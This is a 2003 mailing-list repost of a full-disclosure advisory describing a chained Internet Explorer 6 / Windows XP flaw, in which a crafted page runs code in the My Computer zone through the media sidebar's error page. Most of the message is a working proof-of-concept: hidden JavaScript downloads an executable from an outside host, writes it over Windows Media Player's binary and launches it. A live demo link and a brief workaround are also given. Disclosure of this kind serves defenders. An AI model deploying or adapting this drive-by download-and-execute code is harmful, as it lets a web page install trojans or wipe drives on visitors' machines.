Subject: Internet explorer 6 on XP - ouch (Who needs DCOM?)
From: tcv (tcv@ninjatech.cjb.net)
Date: Thu Sep 11 2003 - 15:50:41 AKDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Original
source:http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html
Internet explorer 6 on windows XP allows exection of arbitrary code
DESCRIPTION :
Yesterday Liu Die Yu released a number series of advisories concerning
internet explorer
by combining on of these issues with an earlier issue I myself reported a
while back
You can construct a specially crafted webpage that can take any action on a
users system
including but not limited to, installing trojans, keyloggers, wiping the
users harddrive etc.
TECHNICAL EXPLAINATION :
Internet explorer 6 comes with a media sidebar in wich you can load and play
mediaclips
without even leaving the browser. when you instruct the mediabar to load a
file from an
unknown host or the HTTP status returned by an existing host indicates an
error
this media bar displays an error page inside the media bar namely
res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path
res URL's are treated as being in the "my computer zone" and are loaded from
the users filesystem
perfect conditions for the issue I describe on
http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg06791.html
To work. now all that is needed is a way to inject this exploit code into
this page
This method was graciously provided by Liu Die Yu as you can read on
http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0
Combining these issues we get something like :
- --snip--
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
- --snip--
error.jsp is a jsp page that consists of one line, namely
<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>
DEMONSTRATION :
A demonstration is provided at :
http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
WORKAROUND :
Disable active scripting or do "the sensible thing" and pick another browser
such as the
excellent mozilla firebird.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)
iD8DBQE/YQpdqzMRhW8EKZsRAhGKAJ9zX5ZqLFrltTM5fTg9rblgKArc+wCdGwFH
Bo9j4yj5a6tRuoWUdjgjOT8=
=Dfkb
-----END PGP SIGNATURE-----
---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.
This archive was generated by hypermail 2a23 : Thu Sep 11 2003 - 15:45:09 AKDT